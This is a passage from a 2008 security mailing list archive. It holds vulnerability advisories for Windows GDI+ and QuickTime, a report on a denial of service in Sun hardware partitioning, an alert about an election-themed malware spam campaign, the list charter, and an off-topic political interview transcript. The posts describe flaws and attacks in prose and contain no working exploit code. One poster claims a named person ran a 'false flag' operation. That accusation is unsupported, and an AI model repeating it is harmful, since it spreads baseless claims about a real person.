e7183e67f50caf1a396570bf7a4f1e89 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7.orig.tar.gz Size/MD5: 933322 e9f38f6f12124b9c19da684c87db9fcf amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_amd64.deb Size/MD5: 91902 412eee43832542bdb31e47a8eec55a4b http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_amd64.deb Size/MD5: 349030 bc73017cf4999c7e5f26218ef2e1e8a5 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_i386.deb Size/MD5: 86470 3496a2a6e102a029364642c5a02d49ea http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_i386.deb Size/MD5: 324144 456c9da0a86535481406445d7e0a3e18 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_lpia.deb Size/MD5: 86776 eafd43eda682ca7a99c3dcff763ea430 http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_lpia.deb Size/MD5: 324314 9349d9ecfb37919ac5caf4f841215a63 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_powerpc.deb Size/MD5: 96006 d4195e7f700808a98fb4f79c9e3fd0a9 http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_powerpc.deb Size/MD5: 350830 eaa04a1b7456ec1ddf95c133aee9e2c8 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_sparc.deb Size/MD5: 91072 f917354fcfa265bf5c008edea716e0ce http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_sparc.deb Size/MD5: 325378 4940622cdeaf063c76b9e090987d5e89 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 235 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080908/bf55427f/attachment.bin From deraadt at cvs.openbsd.org Tue Sep 9 07:56:53 2008 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Tue, 09 Sep 2008 00:56:53 -0600 Subject: [Full-disclosure] Sun M-class hardware denial of service Message-ID: <200809090656.m896urQJ027406@cvs.openbsd.org> Sun/Fujitsu M4000-M9000 machines are very expensive multicpu sparc64 architecture machines, scaling all the way up to 64 processors, 256 cores, and 512 threads. They use the Fujitsu SPARC64 VI (and more recently VII) processors. The smallest models are large (6U 84kg), and the larger models are fridge sized and cost more than a house. These machines can be split into domains. These domains are like virtual machines which can run their own OS, except that they are not virtual. The chassis contains actual partitioning hardware which routes the various cpus to only see specific hardware devices. The physical segmentation of the hardware obviously must be completely secure and reliable to meet Sun's promises of high availability. Sun's system partitioning domains are supposed to be the best of the isolation schemes in the market. But perhaps even they have problems. During the porting of OpenBSD/sparc64 to this family of machines it was discovered that the OS kernel can trigger a fault. This fault is caught by the systems management controller (the XSCF, Fujitsu's version of LOM/RSC console) which then powers the domain down, marks the mainboard in the chassis as faulty, and refuses to allow domains relying on that mainboard to be started. To clarify, the OS kernel does not crash; no -- the domain powers down. Normally one uses commands in the XSCF to power domains on and off. Those commands refuse to power up that domain again saying it has faulted. To repair this problem one must phone a friendly Sun support team. After providing them with the machine's serial number, Sun will dispatch an engineer with a generated series of codes that are valid for a 48-hour period. These codes are used to generate a one-time-password which enables a login to the service console within the XSCF. The engineer then uses the service console to clear the fault on the mainboard. That command then requires a POWERCYCLE OF THE ENTIRE CHASSIS. This means any other domains running on the same hardware must be shutdown to clear the fault generated in another domain. Please note that we have not tried to power cycle the entire chassis without clearing the fault using the Sun procedure. However, we do not see a difference in availability between that and a powercycle requested by the service console. These machines are run in mission critical environments where the concept of 'availability' blends with the concept of 'security'. The main customer base for these machines is apparently banks and other financial institutes. Machine prices start at $29,000, rocket to $180,000 (8 cpu), and continue higher to "Sun won't tell you on the web", so one could expect that the machine should probably not fail in such a harsh way. We do not have any information about how or why this problem happens, but feel compelled to speculate that there might be further problems with domain seperation. Having to power down all the other domains is already, effectively, a big problem in domain seperation. The problem is triggered when OpenBSD/sparc64 spins up the additional strands (threads) of each physical cpu in the domain. The OS continues running for a few moments and then the fault occurs. Newer versions of OpenBSD/sparc64 workaround this problem (diff linked below) by not spinning up the additional strands on SPARC64 VI cpus. But we don't really know why this workaround helps. Since we do not have any tools to characterize the exact problem, the workaround might be accidentally avoiding the fault, but some other action could still cause it. The same problems do not occur on the other domain-capable Sun machines that OpenBSD runs on, for instance, those using UltraSPARC III IV, T1, or T2 processors. http://www.openbsd.org/cgi-bin/cvsweb/src/sys/arch/sparc64/sparc64/cpu.c.diff?r1=1.43&r2=1.44 With the workaround in effect, the result is that this machine running OpenBSD is using half the available cpu, all to avoid a machine problem that might be triggered by something else. We do not yet know if the problem is due to a bug in the cpu, the chassis, or some other firmware component that is involved in domain partitioning. OpenBSD/sparc64 is probably doing something wrong -- but then the OS should crash instead of the domain. Whatever this hardware problem is, it could also be exercised in Solaris by loading a kernel module which does whatever OpenBSD is doing, and thus triggers a domain fault. If an attacker can gain root on a Solaris domain and load such a kernel module, the owner would be forced to eventually powerdown the entire machine and take all other domains down as well (which are running mission critical services, obviously). At http://www.sun.com/servers/white-papers/domains.html Sun claims that their domain technology offers "Complete isolation from software errors in other domains" and provide the benefit that "Mission-critical applications are not impacted by applications running within other domains". Maybe after this bug is fixed... Sun & Fujitsu should fix at least two things: - Greater recoverability. Don't require a powercycle of the chassis for such a type of domain fault, so that a failure of one domain does not kill the availability of other domains. - Don't fault in the first place! Find out what OS action is causing the fault, and make the firmware/hardware accept and handle this condition without faulting the domain. Sun (Australia) was alerted about this problem on July 24, 2008. Various other channels into Sun and Fujitsu were tried as well, but unfortunately noone in "security" seemed to understand that this issue matters, and it seems the engineering people made no progress either. We think the Sun engineers didn't even go through the effort to install OpenBSD in order to reproduce the problem. Any Sun / Fujitsu engineer who wants to solve this problem can either build their own kernel with the above patch un-applied, or can contact <dlg at openbsd.org>, <deraadt at openbsd.org> or <kettenis at openbsd.org>. From xploitable at gmail.com Tue Sep 9 14:48:53 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 9 Sep 2008 14:48:53 +0100 Subject: [Full-disclosure] Fwd: "Sex Scandal" Spam Campaign Targeting US Presidential Election Message-ID: <4b6ee9310809090648h42c6f937o92b3fa0c93f078a6@mail.gmail.com> Is Marcus Sachs responsible? Websense(R) Security Labs? ThreatSeeker? Network has discovered an emerging email campaign which uses the US presidential election as a social engineering mechanism to install information-stealing code on a victim's machine. With less than 2 months before the start of the election, emails are circulating with fake news of a sex scandal affecting one of the candidates. Recipients of the email are encouraged to view a video supposedly involving the Democratic candidate Barack Obama. Users who click the link are shown a pornographic video taken from hxxp://homemade*snip*.com/. While the video plays for 14 seconds, malicious applications are installed on the victim's machine. Screenshot of example email: http://securitylabs.websense.com/content/Alerts/3177.aspx From xploitable at gmail.com Tue Sep 9 15:11:25 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 9 Sep 2008 15:11:25 +0100 Subject: [Full-disclosure] "Sex Scandal" Spam Campaign Targeting US Presidential Election In-Reply-To: <4b6ee9310809090648h42c6f937o92b3fa0c93f078a6@mail.gmail.com> References: <4b6ee9310809090648h42c6f937o92b3fa0c93f078a6@mail.gmail.com> Message-ID: <4b6ee9310809090711s3c0a72a3pdaceed63ceeb7324@mail.gmail.com> On Tue, Sep 9, 2008 at 2:48 PM, n3td3v <xploitable at gmail.com> wrote: > Is Marcus Sachs responsible? > > Websense(R) Security Labs? ThreatSeeker? Network has discovered an > emerging email campaign which uses the US presidential election as a > social engineering mechanism to install information-stealing code on a > victim's machine. With less than 2 months before the start of the > election, emails are circulating with fake news of a sex scandal > affecting one of the candidates. Recipients of the email are > encouraged to view a video supposedly involving the Democratic > candidate Barack Obama. Users who click the link are shown a > pornographic video taken from hxxp://homemade*snip*.com/. While the > video plays for 14 seconds, malicious applications are installed on > the victim's machine. > > Screenshot of example email: > > http://securitylabs.websense.com/content/Alerts/3177.aspx > "How do we get the attention of the next administration as they are coming in?"--Marcus Sachs "How do we play into the media and get their attention?"--Marcus Sachs http://www.youtube.com/watch?v=FSUPTZVlkyU From xploitable at gmail.com Tue Sep 9 16:02:57 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 9 Sep 2008 16:02:57 +0100 Subject: [Full-disclosure] "Sex Scandal" Spam Campaign Targeting US Presidential Election In-Reply-To: <4b6ee9310809090711s3c0a72a3pdaceed63ceeb7324@mail.gmail.com> References: <4b6ee9310809090648h42c6f937o92b3fa0c93f078a6@mail.gmail.com> <4b6ee9310809090711s3c0a72a3pdaceed63ceeb7324@mail.gmail.com> Message-ID: <4b6ee9310809090802j7d0a7effn3c8ebd8e07196837@mail.gmail.com> On Tue, Sep 9, 2008 at 3:11 PM, n3td3v <xploitable at gmail.com> wrote: > On Tue, Sep 9, 2008 at 2:48 PM, n3td3v <xploitable at gmail.com> wrote: >> Is Marcus Sachs responsible? >> >> Websense(R) Security Labs? ThreatSeeker? Network has discovered an >> emerging email campaign which uses the US presidential election as a >> social engineering mechanism to install information-stealing code on a >> victim's machine. With less than 2 months before the start of the >> election, emails are circulating with fake news of a sex scandal >> affecting one of the candidates. Recipients of the email are >> encouraged to view a video supposedly involving the Democratic >> candidate Barack Obama. Users who click the link are shown a >> pornographic video taken from hxxp://homemade*snip*.com/. While the >> video plays for 14 seconds, malicious applications are installed on >> the victim's machine. >> >> Screenshot of example email: >> >> http://securitylabs.websense.com/content/Alerts/3177.aspx >> > > "How do we get the attention of the next administration as they are > coming in?"--Marcus Sachs > > "How do we play into the media and get their attention?"--Marcus Sachs > > http://www.youtube.com/watch?v=FSUPTZVlkyU > This appears to be a false flag operation carried out by the Marcus Sachs clan. http://en.wikipedia.org/wiki/False_flag All the best, n3td3v From mobort at hushmail.com Tue Sep 9 16:47:33 2008 From: mobort at hushmail.com (Month of Bill O'Reilly Transcripts) Date: Tue, 09 Sep 2008 11:47:33 -0400 Subject: [Full-disclosure] Month of Bill O'Reilly Transcripts Message-ID: <20080909154735.5F55920042@smtp.hushmail.com> Forever supporting the philosophies of full-disclosure, it is our honor to humbly present to you the first episode of our latest project - the Month of Bill O'Reilly Transcripts. Many special thanks to the Network Developer and Valdis Kletnieks for making this mailing list great. BILL O'REILLY, HOST: In the "Impact" segment tonight: our first conversation with Senator Barack Obama. It's been a long time coming, as you know. Thursday afternoon, I met with the senator in York, Pennsylvania. Now, we're going to play you the first part of the interview right now, and the rest of it, which is fairly extensive and provocative, will be seen next Monday, Tuesday and Wednesday. Roll the tape. (BEGIN VIDEOTAPE) O'REILLY: Well, first of all, thanks for being a man of your word. BARACK OBAMA, DEMOCRATIC PRESIDENTIAL CANDIDATE: You bet. O'REILLY: But I was worried there for awhile. It's been nine months since we last met in New Hampshire. OBAMA: It took a little while. I've had a few things to do in between, but I appreciate you having me on the show. O'REILLY: OK. Let's start with national security. Do you believe we're in the middle of a War on Terror? OBAMA: Absolutely. O'REILLY: Who's the enemy? OBAMA: Al Qaeda, the Taliban, a whole host of networks that are bent on attacking America, who have a distorted ideology, who have perverted the faith of Islam, and so we have to go after them. O'REILLY: Is Iran part of that component? OBAMA: Iran is a major threat. Now, I don't think that there is a ? the same ? they are not part of the same network. You've got Shia, and you've got Sunni. We've got to have the ability to distinguish between these groups, because, for example, the war in Iraq is a good example, where I believe the administration lumped together Saddam Hussein, a terrible guy, with Al Qaeda, which had nothing to do with Saddam Hussein. O'REILLY: We'll get to that. OBAMA: And as a consequence, we ended up, I think, misdirecting our resources. So they're all part of various terrorist networks that we have to shut down and we have to destroy, but they may not all be part and parcel of the same ideology. O'REILLY: But I still don't understand ? and I'm asking this as an American as well as a journalist ? how threatening you feel Iran is? Look, if Iran gets a nuclear weapon, OK, to me, they're going to give it to Hezbollah if they can develop the technology. Why not? And they'll say, "Well, we didn't have anything to do with it." So therefore, the next president of the United States is going to have to make a decision about Iran, whether to stop them militarily, because I don't believe ? if diplomacy works, fine, but you've got to have a Plan B, and a lot of people say, "Look, Barack Obama is not going to attack Iran." OBAMA: Here's where you and I agree. It is unacceptable for Iran to possess a nuclear weapon. It would be a game changer, and I've said that repeatedly. I've also said I would never take a military option off the table. O'REILLY: But would you prepare for one? OBAMA: Well, listen... O'REILLY: That's the question though, senator. Anybody can say option. Would you prepare for it? OBAMA: Look, it is not appropriate for somebody who is one of two people who can be the president of the United States to start tipping their hand in terms of what their plans might be with respect to Iran. It's sufficient to say I would not take the military option off the table and that I will never hesitate to use our military force in order to protect the homeland and United States' interests. But where I disagree with you is the notion that we've exhausted every other resource, because the fact of the matter is that, for six, seven years, during this administration, we weren't working as closely as we needed to do with the Europeans to create... O'REILLY: Diplomacy might work. You might be able to sanction economically. OBAMA: ?sanctions. O'REILLY: Maybe. O'REILLY: But that's all hypothetical. OBAMA: Everything is hypothetical, but the question is, are we trying to do what we need to do to ratchet up the pressure on them, to change their... O'REILLY: OK. We'll assume you're going to ratchet everything you can ratchet. But I'm going to assume that Iran is going to say, "Blank you. We're going to do what we want." And I want a president, whether it's you or McCain, who says, "You ain't doing that." All right. Let's go to Iraq. I think history will show it's the wrong battlefield, OK? And I think that you were perspicacious in your original assessment of the battlefield. OBAMA: I appreciate that. O'REILLY: I think you were desperately wrong on the surge, and I think you should admit it to the nation that now we have defeated the terrorists in Iraq, and the Al Qaeda came there after we invaded, as you know. We defeated them. OBAMA: Right. O'REILLY: If we didn't, they would have used it as a staging ground. We've also inhibited Iran from controlling the southern part of Iraq by the surge, which you did not support. So why won't you say, "I was right in the beginning. I was wrong about that"? OBAMA: If you listen to what I've said, and I'll repeat it right here on this show, I think that there's no doubt that the violence is down. I believe that that is a testimony to the troops that were sent and General Petraeus and Ambassador Crocker. I think that the surge has succeeded in ways that nobody anticipated, by the way, including President Bush and the other supporters. It has gone very well, partly because of the Anbar situation and the Sunni awakening, partly because of the Shia military. Look... O'REILLY: But if it were up to you, there wouldn't have been a surge. OBAMA: Look... O'REILLY: No, no, no, no. OBAMA: No, no, no... O'REILLY: If it were up to you, there wouldn't have been a surge. OBAMA: No, no, no. O'REILLY: You and Joe Biden, no surge. OBAMA: Hold on a second, Bill. If you look at the debate that was taking place, we had gone through five years of mismanagement of this war that I thought was disastrous. And the president wanted to double down and continue on an open-ended policy that did not create the kinds of pressure on the Iraqis to take responsibility and reconcile. O'REILLY: But it worked. It worked. Come on. OBAMA: Bill, what I've said is ? I've already said it succeed beyond our wildest dreams. O'REILLY: Why can't you say, "I was right in the beginning, and I was wrong about the surge"? OBAMA: Because there's an underlying problem where what have we done. We have reduced the violence. O'REILLY: Yes. OBAMA: But the Iraqis still haven't taken responsibility, and we still don't have the kind of political reconciliation. We are still spending, Bill, $10 to $12 billion a month. O'REILLY: And I hope if you're president, you can get them to kick in and pay us back. OBAMA: They've got $79 billion. O'REILLY: I'll go with you. OBAMA: Let's go. O'REILLY: We'll get some of that money back. All right. Let's go to Afghanistan. Look, there's no winning the Taliban war unless Pakistan cracks down on the guys that are in Pakistan. OBAMA: You and I agree completely. Right. O'REILLY: We all know that. OBAMA: Right. O'REILLY: You gave a speech in Denver ? good speech, by the way. OBAMA: Thank you. O'REILLY: But you bloviated about McCain not following him to the cave. You're not going to invade Pakistan, senator, if you're president. You're not going to send ground troops in there. You know it. OBAMA: Here's the problem. John McCain loves to say, "I would follow them to the gates of Hell." O'REILLY: But he's not going to invade either. OBAMA: And the point is what we could have done... O'REILLY: No, not could. Let's stay in now. OBAMA: What we can do... O'REILLY: Yes. OBAMA: ...is stay focused on Afghanistan and put more pressure on the Pakistanis. O'REILLY: Like what? OBAMA: For example, we are providing them military aid without having enough strings attached. So they're using the military aid that we use to Pakistan, they're preparing for a war against India. O'REILLY: So you're going to pull it out and let the Islamic fundamentalists take them over? OBAMA: No, no, no, no. What we say is, look, we're going to provide them with additional military support targeted at terrorists, and we're going to help build their democracy and provide... O'REILLY: We're doing that now. Negroponte's over there, and he's doing that. OBAMA: That is not what we've been doing, Bill. We've wasted $10 billion with Musharraf without holding him accountable for knocking out those safe havens. O'REILLY: So you are going to ? again, more diplomacy, and we need it, absolutely, trying to convince the Pakistan government to take a more aggressive approach. If you don't, we're going to pull? OBAMA: And what I will do is, if we have bin Laden in our sights... O'REILLY: Yes. OBAMA: ...we target him, and we knock him out. O'REILLY: But everybody would do that. I mean, that would be the biggest win Bush could have. OBAMA: Of course. O'REILLY: If you send ground troops in, all hell breaks loose. OBAMA: We can't ? we can't have ? and nobody talked about some full- blown invasion of Pakistan, but the simple point that I made was we've got to put more pressure on Pakistan to do what they need to do. (END VIDEOTAPE) O'REILLY: All right. Again, the rest of the interview will be seen on Monday, Tuesday and Wednesday of next week, and it is lively. -- Click to become a master chef, own a restaurant and make millions. http://tagline.hushmail.com/fc/Ioyw6h4eAFcCOl4RFfzZ0SDucJpXpgy0wAwlHoqW8OC74tv5fM6JYU/ From le at atelophobia.net Tue Sep 9 18:03:04 2008 From: le at atelophobia.net (Luiz Eduardo) Date: Tue, 9 Sep 2008 10:03:04 -0700 Subject: [Full-disclosure] Call for Papers - YSTS 2.0 - 2008 - Sao Paulo/ Brazil References: <20080822102738.A4258CB6CB@ws5-11.us4.outblaze.com> <29291087.1219413240215.JavaMail.root@m11> Message-ID: <4B84CCE4D5BD4D1DB8D17028F98B4F68@video54.local> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 (sorry for the xpostings) The call for papers for YSTS (you sh0t the sheriff) 2.0 is now open! The 2nd edition will be held in Sao Paulo, Brazil, on November 17th and 18th, 2008 INTRODUCTION YSTS is a very unique event dedicated to the top-notch Information Security Society in Brazil, having local and speakers from abroad. YSTS mixes the highest quality presentations, covering diverse topics in information security, from all technical haxor to management C level good stuff. The goal is make the attendees get the "real big picture" of the current state of information security world, mixing professionals from different Infosec segments of the market. For the attendees, this is almost an invite-only event. So, submitting a talk is certainly a good hack to try to be there, specially if you're local. Due to the success of last year's edition, we'll keep the same format: - - Kicked-back and cozy environment - - YSTS 2.0 will be held at an almost secret location - - Once again, this secret location will, most likely, be a club or a bar - - and yes, we have food and drinks CONFERENCE TOPICS The focus for YSTS 2.0 will include the following: * Operating Systems * Career and Management topics * Mobile Devices/Embedded Systems * Information Security Audit and Control * Web and anything 2.0 * Information Security Policies * Networking/Telecommunication/Radio Frequencies * Incident Response & other applicable (and useful) Infosec Policies * Information Warfare * Malware/ BotNets * User awareness/ Social Networking Threats * Secure Programming * Hacker Spaces/ hacker community * Fuzzing * Physical Security * Virtualization * Cryptography / Obfuscation * Infrastructure and Critical Systems * Caipirinha Hacks * and everything else security related you might think would be good for the conference We like shorter talks, 30 minutes is plenty for you to deliver the message, but, if you feel like you need more time, please be specific in the paper submission WHAT WOULD YOU GET BEING A SPEAKER? * Round-trip economy class air-ticket for one person * Airport transportation arrangements * 4 nights of accommodation * Breakfast, lunch and dinner during conference * After-conference parties * Auditing products in traditional Brazilian barbecue restaurants WHY WOULD YOU WANT TO BE A SPEAKER AND GO TO BRAZIL? * Sao Paulo is a melting-pot of different cultures, with plenty of stuff to do * We really take care of our speakers (you don't have to trust us, I am sure you know at least one of our previous speakers, check with them) * We highly recommend that if you're coming from abroad, you stick around for a few more days * and yeah, beautiful people too CFP SUBMISSION Each paper submission must include the following information: * Name, title, address, email and phone/contact number * Short biography and qualification * Speaking experience * Summary or abstract for your presentation * Technical requirements (others than LCD Projector) * Other publications or conferences where this material has been or will be published/submitted. We do accept submissions in English, Portuguese or Spanish. IMPORTANT DATES Final CFP Submission - October 5th, 2008 Final Notification of Acceptance - October 15th, 2008 Final Material Submission for accepted presentations - November 5th, 2008 Please send your talk submission to cfp/at/ysts.org CONTACT INFORMATION General Inquiries: b0ard/at/ysts.org Sponsorship Inquiries: sponsors/at/ysts.org We hope to see you there! -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.1 (Build 2523) Charset: iso-8859-1 wj8DBQFIxqxIgo//xpeLCaoRAtoyAJsEAZxwHTWMQvrDXfhBomxnt0/7QgCgqkD9 S793ETlQvEITwiC7Z/vxoYY= =2Sgx -----END PGP SIGNATURE----- From johnc at grok.org.uk Tue Sep 9 18:12:35 2008 From: johnc at grok.org.uk (John Cartwright) Date: Tue, 9 Sep 2008 18:12:35 +0100 Subject: [Full-disclosure] List Charter Message-ID: <20080909171235.GA34@grok.org.uk> [Full-Disclosure] Mailing List Charter John Cartwright <johnc at grok.org.uk> - Introduction & Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-request at lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation & Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure at lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. From zdi-disclosures at 3com.com Tue Sep 9 20:41:36 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 14:41:36 -0500 Subject: [Full-disclosure] ZDI-08-056: Microsoft Windows GDI+ GIF Parsing Code Execution Vulnerability Message-ID: <OFFEF132A5.28D4E1B4-ON882574BF.006BE960-862574BF.006C2E07@3com.com> ZDI-08-056: Microsoft Windows GDI+ GIF Parsing Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-056 September 9, 2008 -- CVE ID: CVE-2008-3013 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Windows Server 2008 Microsoft Windows XP Microsoft Windows Vista Microsoft Windows Server 2003 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6358. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows XP, Server and Vista. User interaction is required in that a user must open a malicious image file or browse to a malicious website. The specific flaws exist in the GDI+ subsystem when parsing maliciously crafted GIF files. By supplying a malformed graphic control extension an attacker can trigger an exploitable memory corruption condition. Successful exploitation can result in arbitrary code execution under the credentials of the currently logged in user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS08-052.mspx -- Disclosure Timeline: 2008-02-07 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Ivan Fratric -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Tue Sep 9 20:41:29 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 14:41:29 -0500 Subject: [Full-disclosure] ZDI-08-055: Microsoft Windows GDI+ BMP Parsing Code Execution Vulnerability Message-ID: <OF43F6E0AD.B75ACC26-ON882574BF.006BE869-862574BF.006C2B2D@3com.com> ZDI-08-055: Microsoft Windows GDI+ BMP Parsing Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-055 September 9, 2008 -- CVE ID: CVE-2008-3015 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Windows XP Microsoft Windows Server 2008 Microsoft Windows Vista Microsoft Windows Server 2003 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6375. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows XP, Server and Vista. User interaction is required in that a user must open a malicious image file. The specific flaws exist in the GDI+ subsystem when parsing maliciously crafted BMP files. Supplying a malformed BitMapInfoHeader can result in incorrect integer calculations further leading to an exploitable memory corruption. Successful exploitation can result in arbitrary code execution under the credentials of the currently logged in user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS08-052.mspx -- Disclosure Timeline: 2007-07-20 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Tue Sep 9 22:58:19 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 16:58:19 -0500 Subject: [Full-disclosure] ZDI-08-060: Apple QuickTime AVC1 Atom Parsing Heap Overflow Vulnerability Message-ID: <OFF59ED1E8.2C1D86DC-ON882574BF.00782104-862574BF.0078B237@3com.com> ZDI-08-060: Apple QuickTime AVC1 Atom Parsing Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-060 September 9, 2008 -- CVE ID: CVE-2008-3627 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6169. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple QuickTime Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in the parsing of AVC1 atoms. An integer overflow condition is present that can result in a heap chunk being under-allocated. This heap corruption can be further leveraged to execute arbitrary code under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3027 -- Disclosure Timeline: 2008-05-15 - Vulnerability reported 